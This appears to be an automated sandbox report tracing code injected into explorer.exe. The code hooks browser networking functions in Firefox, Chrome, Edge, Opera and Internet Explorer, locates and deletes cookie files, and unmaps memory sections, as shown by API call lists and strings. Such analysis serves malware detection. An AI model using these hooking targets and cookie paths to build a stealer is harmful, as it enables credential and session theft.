Instruction ID: bf338760b693de9c48f335df20d61b52cdf40c1426065803c7bfdbd9f2fc554a
Opcode Fuzzy Hash: 5a5eb2af261c3e2777a2001d21d26342fefcbd72fc0d5bb9121479b3ba798328
Instruction Fuzzy Hash: 76A18375618305EFD710DF68D888A2FBBE9EF88744F04482EF685D7292DB70D9488B52

Function 03201ECE Relevance: 12.1, APIs: 8, Instructions: 90
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

StrStrIA.SHLWAPI(?,032031D8,00000000,03517460), ref: 03201EE4
RtlMoveMemory.NTDLL(?,?,00000000), ref: 03201F08
RtlMoveMemory.NTDLL(?,?,00000100), ref: 03201F22
StrStrIA.SHLWAPI(00000000,?,?,00000000), ref: 03201F31
StrStrIA.SHLWAPI(00000000,?,?,00000000), ref: 03201F44
StrStrIA.SHLWAPI(?,?,?,00000000), ref: 03201F57
lstrlen.KERNEL32(?,?,00000000), ref: 03201F64
lstrlen.KERNEL32(?,?,?,00000000), ref: 03201F9D

Memory Dump Source

Source File: 00000015.00000002.1997611878.0000000003201000.00000040.80000000.00040000.00000000.sdmp, Offset: 03201000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_3201000_explorer.jbxd

Similarity

API ID: MemoryMovelstrlen
String ID:
API String ID: 456560858-0
Opcode ID: 01610372c196cad5fed2f01493cd42780e0e4a400465563cc91c0f04ce694a4c
Instruction ID: b97d107f7cc7a5133baf460d224049b1440a5c5975eb803b964131194f8b281b
Opcode Fuzzy Hash: 01610372c196cad5fed2f01493cd42780e0e4a400465563cc91c0f04ce694a4c
Instruction Fuzzy Hash: 132128BA41430A69D730E964EC8DEFBB7DC9F45344F440926F680C3093D729F09D86A2

Function 03201E44 Relevance: 7.6, APIs: 5, Instructions: 81
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlen.KERNEL32(?,?,?,?,?,?,?,03201BF4), ref: 03201E5D
CharLowerBuffA.USER32(?,00000000,?,?,?,?,?,?,?,03201BF4), ref: 03201E69
lstrcmpiA.KERNEL32(?,03518404), ref: 03201E81
lstrlen.KERNEL32(?,00000000), ref: 03202699
RtlMoveMemory.NTDLL(03518404,?,00000000), ref: 032026A2

Memory Dump Source

Source File: 00000015.00000002.1997611878.0000000003201000.00000040.80000000.00040000.00000000.sdmp, Offset: 03201000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_3201000_explorer.jbxd

Similarity

API ID: lstrlen$BuffCharLowerMemoryMovelstrcmpi
String ID:
API String ID: 2826435453-0
Opcode ID: 6c2a8733dbe54ea837a82ef73de9d85e46dda8bd83e2308fbe2ec6acbbe6b107
Instruction ID: ec181cdd8be5f321879a07e2b2ba406d19c5a065768b165ce03a3b9c46f5d650
Opcode Fuzzy Hash: 6c2a8733dbe54ea837a82ef73de9d85e46dda8bd83e2308fbe2ec6acbbe6b107
Instruction Fuzzy Hash: 18213BBAB113109FD700DF24FC889BEB79DEF89315B04442AE944CB282D771A84E87E1

Function 03201E3E Relevance: 7.6, APIs: 5, Instructions: 76
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlen.KERNEL32(?,?,?,?,?,?,?,03201BF4), ref: 03201E5D
CharLowerBuffA.USER32(?,00000000,?,?,?,?,?,?,?,03201BF4), ref: 03201E69
lstrcmpiA.KERNEL32(?,03518404), ref: 03201E81
lstrlen.KERNEL32(?,00000000), ref: 03202699
RtlMoveMemory.NTDLL(03518404,?,00000000), ref: 032026A2

Memory Dump Source

Source File: 00000015.00000002.1997611878.0000000003201000.00000040.80000000.00040000.00000000.sdmp, Offset: 03201000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_3201000_explorer.jbxd

Similarity

API ID: lstrlen$BuffCharLowerMemoryMovelstrcmpi
String ID:
API String ID: 2826435453-0
Opcode ID: a7d4b919866049850c99b8924756beaa7973dcb558b1275bf84d4800f8e1768e
Instruction ID: 027482479b1a35e3477de1789534a6a19c5da136ed7f3f1d91bfc3c7d0e3d60f
Opcode Fuzzy Hash: a7d4b919866049850c99b8924756beaa7973dcb558b1275bf84d4800f8e1768e
Instruction Fuzzy Hash: D6210B79A113119FD711DF24EC8897E77EDEF8A314B04446AE944DB282C771A84E87E1

Function 032018F4 Relevance: 6.1, APIs: 4, Instructions: 51
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0320190C
GetFileSize.KERNEL32(00000000,00000000), ref: 0320191C
CloseHandle.KERNEL32(00000000), ref: 03201966

Part of subcall function 032029B7: GetProcessHeap.KERNEL32(00000008,00000412,0320257A,032018F4), ref: 032029BA
Part of subcall function 032029B7: RtlAllocateHeap.NTDLL(00000000), ref: 032029C1

ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 03201941

Memory Dump Source

Source File: 00000015.00000002.1997611878.0000000003201000.00000040.80000000.00040000.00000000.sdmp, Offset: 03201000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_3201000_explorer.jbxd

Similarity

API ID: File$Heap$AllocateCloseCreateHandleProcessReadSize
String ID:
API String ID: 2517252058-0
Opcode ID: 833a2a12d92a6721d679635e30d2e6ce5232948d63a6c3c0a69439081d5a376d
Instruction ID: cb15f3706b643696502776a2346e64460fc428e4449b2245e63e79ebb391fe6d
Opcode Fuzzy Hash: 833a2a12d92a6721d679635e30d2e6ce5232948d63a6c3c0a69439081d5a376d
Instruction Fuzzy Hash: 3B012B3A31131877D320FA75AC4CF6F755DCB827B4F014629B5D7A61C2DA60A85D4270

Analysis Process: explorer.exePID: 2936, Parent PID: 3968COMMON

Execution Graph

Execution Coverage:	13.9%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	223
Total number of Limit Nodes:	16

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 02C23862 Relevance: 142.1, APIs: 54, Strings: 27, Instructions: 334
libraryloaderstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02C21000: GetProcessHeap.KERNEL32(00000008,00000208,02C21418), ref: 02C21003
Part of subcall function 02C21000: RtlAllocateHeap.NTDLL(00000000), ref: 02C2100A

GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 02C23886
GetCurrentProcessId.KERNEL32(00000001), ref: 02C2389B
wsprintfA.USER32 ref: 02C238B6

Part of subcall function 02C2118D: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 02C211A9
Part of subcall function 02C2118D: CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 02C211C1
Part of subcall function 02C2118D: lstrlen.KERNEL32(?,00000000), ref: 02C211C9
Part of subcall function 02C2118D: CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 02C211D4
Part of subcall function 02C2118D: CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 02C211EE
Part of subcall function 02C2118D: wsprintfA.USER32 ref: 02C21205
Part of subcall function 02C2118D: CryptDestroyHash.ADVAPI32(?), ref: 02C2121E
Part of subcall function 02C2118D: CryptReleaseContext.ADVAPI32(?,00000000), ref: 02C21228

CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 02C238CD
GetLastError.KERNEL32 ref: 02C238D3
RtlInitializeCriticalSection.NTDLL(02C26038), ref: 02C238F3
PathFindFileNameA.SHLWAPI(?), ref: 02C238FA
lstrcat.KERNEL32(02C25CDE,00000000), ref: 02C23910
Sleep.KERNEL32(000001F4), ref: 02C2392A
lstrcmpiA.KERNEL32(00000000,firefox.exe), ref: 02C2393C
GetCommandLineW.KERNEL32(?), ref: 02C2394F
GetModuleHandleA.KERNEL32(kernel32.dll,VirtualQuery), ref: 02C2397E
GetProcAddress.KERNEL32(00000000), ref: 02C23987
GetModuleHandleA.KERNEL32(nspr4.dll,PR_GetDescType), ref: 02C239AF
GetProcAddress.KERNEL32(00000000), ref: 02C239B2
GetModuleHandleA.KERNEL32(nss3.dll,PR_GetDescType), ref: 02C239C4
GetProcAddress.KERNEL32(00000000), ref: 02C239C7
GetModuleHandleA.KERNEL32(nspr4.dll,PR_Write), ref: 02C239E1
GetProcAddress.KERNEL32(00000000), ref: 02C239E4
GetModuleHandleA.KERNEL32(nss3.dll,PR_Write), ref: 02C239EC
GetProcAddress.KERNEL32(00000000), ref: 02C239EF
lstrcmpiA.KERNEL32(00000000,chrome.exe), ref: 02C23A6D
GetCommandLineA.KERNEL32(NetworkService), ref: 02C23A78
StrStrIA.SHLWAPI(00000000), ref: 02C23A7B
lstrcmpiA.KERNEL32(00000000,opera.exe), ref: 02C23A8E
GetCommandLineA.KERNEL32(NetworkService), ref: 02C23A9D
StrStrIA.SHLWAPI(00000000), ref: 02C23AA0
GetModuleHandleA.KERNEL32(opera.dll), ref: 02C23ABF
GetModuleHandleA.KERNEL32(opera_browser.dll), ref: 02C23ACC
CommandLineToArgvW.SHELL32(00000000), ref: 02C23956

Part of subcall function 02C216C7: GetCurrentProcessId.KERNEL32 ref: 02C216D9
Part of subcall function 02C216C7: GetCurrentThreadId.KERNEL32 ref: 02C216E1
Part of subcall function 02C216C7: CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 02C216F1
Part of subcall function 02C216C7: Thread32First.KERNEL32(00000000,0000001C), ref: 02C216FF
Part of subcall function 02C216C7: CloseHandle.KERNEL32(00000000), ref: 02C21758

lstrcmpiA.KERNEL32(00000000,iexplore.exe), ref: 02C23A10
lstrcmpiA.KERNEL32(00000000,microsoftedgecp.exe), ref: 02C23A20
lstrcmpiA.KERNEL32(00000000,msedge.exe), ref: 02C23A30
GetCommandLineA.KERNEL32(NetworkService), ref: 02C23A47
StrStrIA.SHLWAPI(00000000), ref: 02C23A4A
GetModuleHandleA.KERNEL32(chrome.dll), ref: 02C23A5F
GetModuleHandleA.KERNEL32(wininet.dll,HttpSendRequestA), ref: 02C23B2C
GetProcAddress.KERNEL32(00000000), ref: 02C23B35
GetModuleHandleA.KERNEL32(wininet.dll,HttpSendRequestW), ref: 02C23B52
GetProcAddress.KERNEL32(00000000), ref: 02C23B55
GetModuleHandleA.KERNEL32(wininet.dll,InternetWriteFile), ref: 02C23B72
GetProcAddress.KERNEL32(00000000), ref: 02C23B75
GetModuleHandleA.KERNEL32(wininet.dll,HttpQueryInfoA), ref: 02C23B99
GetProcAddress.KERNEL32(00000000), ref: 02C23B9C
GetModuleHandleA.KERNEL32(wininet.dll,InternetQueryOptionA), ref: 02C23BA9
GetProcAddress.KERNEL32(00000000), ref: 02C23BAC
GetModuleHandleA.KERNEL32(wininet.dll,InternetGetCookieA), ref: 02C23BB9
GetProcAddress.KERNEL32(00000000), ref: 02C23BBC

Part of subcall function 02C21C08: RtlMoveMemory.NTDLL(00000000,?,00000000), ref: 02C21C42

RtlExitUserThread.NTDLL(00000000), ref: 02C23BD9
wsprintfA.USER32 ref: 02C23C1F
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02C23C69
Process32First.KERNEL32(00000000,?), ref: 02C23C88
CloseHandle.KERNELBASE(00000000), ref: 02C23D77
Sleep.KERNELBASE(000003E8), ref: 02C23D82

Strings

%s%s, xrefs: 02C23C19
VirtualQuery, xrefs: 02C23974
chrome.exe, xrefs: 02C23A67
NetworkService, xrefs: 02C23A42, 02C23A73, 02C23A98
msedge.exe, xrefs: 02C23A2A
InternetGetCookieA, xrefs: 02C23BAE
microsoftedgecp.exe, xrefs: 02C23A1A
PR_GetDescType, xrefs: 02C239A4, 02C239A9, 02C239C2
opera.exe, xrefs: 02C23A88
fgclearcookies, xrefs: 02C23C3D
nspr4.dll, xrefs: 02C239AA, 02C239DC
wininet.dll, xrefs: 02C23B21, 02C23B2B, 02C23B51, 02C23B71, 02C23B98, 02C23BA3, 02C23BB3
opera.dll, xrefs: 02C23AB0
PR_Write, xrefs: 02C239D6, 02C239DB, 02C239EA
%s%d%d%d, xrefs: 02C238B0
kernel32.dll, xrefs: 02C23979
HttpQueryInfoA, xrefs: 02C23B93
HttpSendRequestA, xrefs: 02C23B26
InternetWriteFile, xrefs: 02C23B6C
msedge.dll, xrefs: 02C23A50
opera_browser.dll, xrefs: 02C23AC7
HttpSendRequestW, xrefs: 02C23B4C
chrome.dll, xrefs: 02C23A81
firefox.exe, xrefs: 02C23936
iexplore.exe, xrefs: 02C23A0A
InternetQueryOptionA, xrefs: 02C23B9E
nss3.dll, xrefs: 02C239B9, 02C239C3, 02C239EB

Memory Dump Source

Source File: 00000016.00000002.2534826625.0000000002C21000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_2c21000_explorer.jbxd

Similarity

API ID: Handle$Module$AddressProc$Cryptlstrcmpi$CommandLine$CreateHash$CurrentProcesswsprintf$CloseContextFileFirstHeapNameSleepSnapshotThreadToolhelp32$AcquireAllocateArgvCriticalDataDestroyErrorExitFindInitializeLastMemoryMoveMutexParamPathProcess32ReleaseSectionThread32Userlstrcatlstrlen
String ID: %s%d%d%d$%s%s$HttpQueryInfoA$HttpSendRequestA$HttpSendRequestW$InternetGetCookieA$InternetQueryOptionA$InternetWriteFile$NetworkService$PR_GetDescType$PR_Write$VirtualQuery$chrome.dll$chrome.exe$fgclearcookies$firefox.exe$iexplore.exe$kernel32.dll$microsoftedgecp.exe$msedge.dll$msedge.exe$nspr4.dll$nss3.dll$opera.dll$opera.exe$opera_browser.dll$wininet.dll
API String ID: 2480436012-2618538661
Opcode ID: 16f92c4055fb6c37034b9c2fbd7acf28c7b7daf6cbd330e5dae87059d2844c1e
Instruction ID: ec39af30dffda6c82bfb602f746cb685bc68f0a5318dfc860dacacfc8eaca45a
Opcode Fuzzy Hash: 16f92c4055fb6c37034b9c2fbd7acf28c7b7daf6cbd330e5dae87059d2844c1e
Instruction Fuzzy Hash: 8AA1D570E903B4ABE6347B755C08F2F3A9D9F80B45B060A64E906E3141DFB8C90D9AF5

Function 02C215BE Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 87
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02C21000: GetProcessHeap.KERNEL32(00000008,00000208,02C21418), ref: 02C21003
Part of subcall function 02C21000: RtlAllocateHeap.NTDLL(00000000), ref: 02C2100A

PathCombineW.SHLWAPI(00000000,00000000,*.*,7750F770,00000000,75B4B2E0,776883D0), ref: 02C215EB
FindFirstFileW.KERNELBASE(00000000,?), ref: 02C215F7
lstrcmpiW.KERNEL32(?,02C241C8), ref: 02C21623
lstrcmpiW.KERNEL32(?,02C241CC), ref: 02C21633
PathCombineW.SHLWAPI(00000000,?,?), ref: 02C2164C
PathMatchSpecW.SHLWAPI(?,Cookies*), ref: 02C21661
PathCombineW.SHLWAPI(00000000,?,?), ref: 02C2167E
FindNextFileW.KERNELBASE(00000000,00000010), ref: 02C2169C
FindClose.KERNELBASE(00000000), ref: 02C216AB

Strings

Cookies*, xrefs: 02C2165F
*.*, xrefs: 02C215DE

Memory Dump Source

Source File: 00000016.00000002.2534826625.0000000002C21000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_2c21000_explorer.jbxd

Similarity

API ID: Path$CombineFind$FileHeaplstrcmpi$AllocateCloseFirstMatchNextProcessSpec
String ID: *.*$Cookies*
API String ID: 4256701249-3228320225
Opcode ID: ce200404e9b5046141ab3b82b5157cfdb21d5d751b5a0d32947b3ef6ab8d9b04
Instruction ID: 83a8a806787667f9a5abd764e522b9aa9e2d52ae433f564a627c1f4dd389807e
Opcode Fuzzy Hash: ce200404e9b5046141ab3b82b5157cfdb21d5d751b5a0d32947b3ef6ab8d9b04
Instruction Fuzzy Hash: 822185316043755BD324AA60DC44A7F7BADEB89395F090A29F94AE3241DFB4C90C4BE2

Function 02C214D8 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 70
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02C213FE: wsprintfW.USER32 ref: 02C2142A
Part of subcall function 02C213FE: FindFirstFileW.KERNELBASE(00000000,?), ref: 02C21439
Part of subcall function 02C213FE: wsprintfW.USER32 ref: 02C21476
Part of subcall function 02C213FE: RemoveDirectoryW.KERNELBASE(00000000), ref: 02C2149C
Part of subcall function 02C213FE: FindNextFileW.KERNELBASE(00000000,00000010), ref: 02C214AF
Part of subcall function 02C213FE: FindClose.KERNELBASE(00000000), ref: 02C214BA

Part of subcall function 02C21000: GetProcessHeap.KERNEL32(00000008,00000208,02C21418), ref: 02C21003
Part of subcall function 02C21000: RtlAllocateHeap.NTDLL(00000000), ref: 02C2100A

wsprintfW.USER32 ref: 02C2150D
FindFirstFileW.KERNELBASE(00000000,?), ref: 02C2151C
wsprintfW.USER32 ref: 02C21557
SetFileAttributesW.KERNEL32(00000000,00000020), ref: 02C2156A
DeleteFileW.KERNELBASE(00000000), ref: 02C21571
FindNextFileW.KERNELBASE(00000000,00000010), ref: 02C21584
FindClose.KERNELBASE(00000000), ref: 02C2158F

Strings

%s%s, xrefs: 02C21503, 02C21551
*.*, xrefs: 02C214FB

Memory Dump Source

Source File: 00000016.00000002.2534826625.0000000002C21000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_2c21000_explorer.jbxd

Similarity

API ID: FileFind$wsprintf$CloseFirstHeapNext$AllocateAttributesDeleteDirectoryProcessRemove
String ID: %s%s$*.*
API String ID: 2055899612-705776850
Opcode ID: c08f87d083ae0030ff356ad151768705b65d72ffc8e44ddd28473335aac33ebd
Instruction ID: 49c743253d0e1f6ff8c48b23642d403173dbd4cd3fc14fec755c7ab459e959e2
Opcode Fuzzy Hash: c08f87d083ae0030ff356ad151768705b65d72ffc8e44ddd28473335aac33ebd
Instruction Fuzzy Hash: B21127316003205BD334AB349C48F6F3B9DEF85354F040A28FD4692183DFB48A5D8AE6

Function 02C213FE Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 69
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02C21000: GetProcessHeap.KERNEL32(00000008,00000208,02C21418), ref: 02C21003
Part of subcall function 02C21000: RtlAllocateHeap.NTDLL(00000000), ref: 02C2100A

wsprintfW.USER32 ref: 02C2142A
FindFirstFileW.KERNELBASE(00000000,?), ref: 02C21439
wsprintfW.USER32 ref: 02C21476

Part of subcall function 02C214D8: wsprintfW.USER32 ref: 02C2150D
Part of subcall function 02C214D8: FindFirstFileW.KERNELBASE(00000000,?), ref: 02C2151C
Part of subcall function 02C214D8: wsprintfW.USER32 ref: 02C21557
Part of subcall function 02C214D8: SetFileAttributesW.KERNEL32(00000000,00000020), ref: 02C2156A
Part of subcall function 02C214D8: DeleteFileW.KERNELBASE(00000000), ref: 02C21571
Part of subcall function 02C214D8: FindNextFileW.KERNELBASE(00000000,00000010), ref: 02C21584
Part of subcall function 02C214D8: FindClose.KERNELBASE(00000000), ref: 02C2158F

RemoveDirectoryW.KERNELBASE(00000000), ref: 02C2149C
FindNextFileW.KERNELBASE(00000000,00000010), ref: 02C214AF
FindClose.KERNELBASE(00000000), ref: 02C214BA

Strings

%s%s\, xrefs: 02C21470
%s%s, xrefs: 02C21420
*.*, xrefs: 02C21418

Memory Dump Source

Source File: 00000016.00000002.2534826625.0000000002C21000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_2c21000_explorer.jbxd

Similarity

API ID: FileFind$wsprintf$CloseFirstHeapNext$AllocateAttributesDeleteDirectoryProcessRemove
String ID: %s%s$%s%s\$*.*
API String ID: 2055899612-4093207852
Opcode ID: ace01f9cb157ae63ab699ca6c99b3447e723aca70130d55a59652cb39d8aea83
Instruction ID: 202b0777bf806f9e45292d0e7fd00c54e13ec3536810c50e601e7f03285bdf1f
Opcode Fuzzy Hash: ace01f9cb157ae63ab699ca6c99b3447e723aca70130d55a59652cb39d8aea83
Instruction Fuzzy Hash: 871127306043605BE324AB24DC48B7F7BDDEFC5305F090A2CF94AA2183DFB4494D8AA2

Function 02C23D8D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02C21274: VirtualQuery.KERNEL32(?,?,0000001C), ref: 02C21281

Part of subcall function 02C21000: GetProcessHeap.KERNEL32(00000008,00000208,02C21418), ref: 02C21003
Part of subcall function 02C21000: RtlAllocateHeap.NTDLL(00000000), ref: 02C2100A

RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 02C23DAF
RtlMoveMemory.NTDLL(00000000,?,?), ref: 02C23DE2
NtUnmapViewOfSection.NTDLL(000000FF), ref: 02C23DEB

Strings

0-gw, xrefs: 02C23DEB

Memory Dump Source

Source File: 00000016.00000002.2534826625.0000000002C21000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_2c21000_explorer.jbxd

Similarity

API ID: HeapMemoryMove$AllocateProcessQuerySectionUnmapViewVirtual
String ID: 0-gw
API String ID: 4050682147-86502385
Opcode ID: 9697bbd9cf962abae5d01a92670ac8417127d4336fc369e3c5e6eae67044fa3b
Instruction ID: 3a9ff2379f095bb2be52af11f0edac16e2996aef307734dbc0ccdfd6ed879936
Opcode Fuzzy Hash: 9697bbd9cf962abae5d01a92670ac8417127d4336fc369e3c5e6eae67044fa3b
Instruction Fuzzy Hash: 8301B5309541E0EFC638AB68D848B673B5DEF40311F154A99A41697180CF3E865DEFF4

Function 02C22EA8 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 19
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

StrStrIA.KERNELBASE(chrome.exe|opera.exe|msedge.exe,?,00000000,?,02C23CD2), ref: 02C22EB4

Part of subcall function 02C22E1B: OpenProcess.KERNEL32(00001000,00000000,?,?,00000001,?,02C22EC5), ref: 02C22E27
Part of subcall function 02C22E1B: NtQueryInformationProcess.NTDLL(00000000,0000003C,00000000,00010006,?), ref: 02C22E52
Part of subcall function 02C22E1B: NtQueryInformationProcess.NTDLL(00000000,0000003C,00000000,?,?), ref: 02C22E7F
Part of subcall function 02C22E1B: StrStrIW.SHLWAPI(?,NetworkService), ref: 02C22E92

Strings

chrome.exe|opera.exe|msedge.exe, xrefs: 02C22EAB

Memory Dump Source

Source File: 00000016.00000002.2534826625.0000000002C21000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_2c21000_explorer.jbxd

Similarity

API ID: Process$InformationQuery$Open
String ID: chrome.exe|opera.exe|msedge.exe
API String ID: 4117927671-3743313796
Opcode ID: aecf36bfa16d55c4679ef59ad417f013a676d8fdd34ef9055bb6e8c8ae734f1a
Instruction ID: a6d90cab9848d3db3bad3cc83fffc043fa26ceb8ec9dc49273c5ffa29f5f415a
Opcode Fuzzy Hash: aecf36bfa16d55c4679ef59ad417f013a676d8fdd34ef9055bb6e8c8ae734f1a
Instruction Fuzzy Hash: DAD0A93230027007273C297A6C0992FA58ECAC2962302023EE802D3200EE40CC0752A1

Function 02C23709 Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 73
stringsleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02C21363: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02C21374
Part of subcall function 02C21363: Process32First.KERNEL32(00000000,?), ref: 02C21393
Part of subcall function 02C21363: CloseHandle.KERNELBASE(00000000), ref: 02C213CB

Part of subcall function 02C21363: lstrcmpiA.KERNEL32(?), ref: 02C213A3
Part of subcall function 02C21363: Process32Next.KERNEL32(00000000,00000128), ref: 02C213C0

Sleep.KERNELBASE(000003E8,?,00000000,00000001,?,?,02C23839,?,02C23C53,00000001), ref: 02C23731

Part of subcall function 02C21000: GetProcessHeap.KERNEL32(00000008,00000208,02C21418), ref: 02C21003
Part of subcall function 02C21000: RtlAllocateHeap.NTDLL(00000000), ref: 02C2100A

SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000,?,00000000,00000001,?,?,02C23839,?,02C23C53,00000001), ref: 02C23752
lstrcatW.KERNEL32(00000000,\Google\Chrome\User Data\,?,00000000,00000001,?,?,02C23839,?,02C23C53,00000001), ref: 02C23764

Part of subcall function 02C215BE: PathCombineW.SHLWAPI(00000000,00000000,*.*,7750F770,00000000,75B4B2E0,776883D0), ref: 02C215EB
Part of subcall function 02C215BE: FindFirstFileW.KERNELBASE(00000000,?), ref: 02C215F7
Part of subcall function 02C215BE: lstrcmpiW.KERNEL32(?,02C241C8), ref: 02C21623
Part of subcall function 02C215BE: lstrcmpiW.KERNEL32(?,02C241CC), ref: 02C21633
Part of subcall function 02C215BE: PathCombineW.SHLWAPI(00000000,?,?), ref: 02C2164C
Part of subcall function 02C215BE: FindNextFileW.KERNELBASE(00000000,00000010), ref: 02C2169C
Part of subcall function 02C215BE: FindClose.KERNELBASE(00000000), ref: 02C216AB

RtlZeroMemory.NTDLL(00000000,00001000), ref: 02C2377A
SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000,?,00000000,00000001,?,?,02C23839,?,02C23C53,00000001), ref: 02C23783
lstrcatW.KERNEL32(00000000,\Microsoft\Edge\User Data\,?,00000000,00000001,?,?,02C23839,?,02C23C53,00000001), ref: 02C2378F
RtlZeroMemory.NTDLL(00000000,00001000), ref: 02C237A3
SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000,?,00000000,00000001,?,?,02C23839,?,02C23C53,00000001), ref: 02C237AC
lstrcatW.KERNEL32(00000000,\Opera Software\Opera Stable\,?,00000000,00000001,?,?,02C23839,?,02C23C53,00000001), ref: 02C237B8

Strings

\Opera Software\Opera Stable\, xrefs: 02C237B2
Cookies*, xrefs: 02C23766, 02C23791, 02C237BA
chrome.exe, xrefs: 02C2370E
opera.exe, xrefs: 02C23718
\Google\Chrome\User Data\, xrefs: 02C2375E
msedge.exe, xrefs: 02C23722
\Microsoft\Edge\User Data\, xrefs: 02C23789

Memory Dump Source

Source File: 00000016.00000002.2534826625.0000000002C21000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_2c21000_explorer.jbxd

Similarity

API ID: Path$FindFolderSpeciallstrcatlstrcmpi$CloseCombineFileFirstHeapMemoryNextProcess32Zero$AllocateCreateHandleProcessSleepSnapshotToolhelp32
String ID: Cookies*$\Google\Chrome\User Data\$\Microsoft\Edge\User Data\$\Opera Software\Opera Stable\$chrome.exe$msedge.exe$opera.exe
API String ID: 909495591-1175993956
Opcode ID: 4568cc9e65104476a4f125ac23c10b300af50160f1fcdf32415280043b758b6c
Instruction ID: c7deea98261059f8ea4029a4fecc020e11a3de87ca42797a83d96845e53e284b
Opcode Fuzzy Hash: 4568cc9e65104476a4f125ac23c10b300af50160f1fcdf32415280043b758b6c
Instruction Fuzzy Hash: 0A11CE603813B423F83833651C82F6F654EDFA5FA1F160124F20A6A6C1CEC49A0959AE

Function 02C23BE1 Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 130
stringsleepprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02C21000: GetProcessHeap.KERNEL32(00000008,00000208,02C21418), ref: 02C21003
Part of subcall function 02C21000: RtlAllocateHeap.NTDLL(00000000), ref: 02C2100A

wsprintfA.USER32 ref: 02C23C1F

Part of subcall function 02C21235: OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 02C2123F
Part of subcall function 02C21235: MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,00000000,02C23C33), ref: 02C21251

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02C23C69
Process32First.KERNEL32(00000000,?), ref: 02C23C88
lstrcmpiA.KERNEL32(?,firefox.exe), ref: 02C23CA1
lstrcmpiA.KERNEL32(?,iexplore.exe), ref: 02C23CB1
lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 02C23CC1
lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 02C23D12
Process32Next.KERNEL32(00000000,00000128), ref: 02C23D68
CloseHandle.KERNELBASE(00000000), ref: 02C23D77
Sleep.KERNELBASE(000003E8), ref: 02C23D82

Part of subcall function 02C21141: lstrlen.KERNEL32(?,?,?,00000000,?,02C229DD,00000001), ref: 02C21150
Part of subcall function 02C21141: lstrlen.KERNEL32(:method POST,?,00000000,?,02C229DD,00000001), ref: 02C21155

Strings

%s%s, xrefs: 02C23C19
iexplore.exe, xrefs: 02C23A0A, 02C23CA7
firefox.exe, xrefs: 02C23936, 02C23C9B
fgclearcookies, xrefs: 02C23C3D
microsoftedgecp.exe, xrefs: 02C23A1A, 02C23CB7, 02C23D08

Memory Dump Source

Source File: 00000016.00000002.2534826625.0000000002C21000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_2c21000_explorer.jbxd

Similarity

